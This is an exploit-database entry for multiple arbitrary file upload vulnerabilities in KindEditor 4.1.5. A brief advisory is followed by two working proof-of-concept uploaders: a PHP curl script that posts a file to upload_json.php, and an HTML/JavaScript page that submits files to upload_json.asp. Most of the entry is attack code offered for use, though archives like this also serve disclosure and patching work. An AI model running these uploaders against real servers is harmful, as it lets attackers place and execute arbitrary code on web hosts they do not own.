KindEditor - Multiple Arbitrary File Upload Vulnerabilities

2013-03-11T00:00:00
ID EXPLOITPACK:440FAAE6363FC6B56FFC3BE500F5CB99
Type exploitpack
Reporter KedAns-Dz
Modified 2013-03-11T00:00:00

Description

KindEditor - Multiple Arbitrary File Upload Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/58431/info

KindEditor is prone to multiple remote file-upload vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit these issues to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

KindEditor 4.1.5 is vulnerable; other versions may also be affected. 

<?php
 
$uploadfile="KedAns.txt";
$ch = curl_init("http://www.example.com/kindeditor/php/upload_json.php?dir=file");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

# KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
--------------------------------------------------

<html><head>
<title>Uploader By KedAns-Dz</title>
<script src="http://www.example.com/kindeditor/kindeditor-min.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://www.example.com/kindeditor/php/upload_json.asp?dir=file',
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>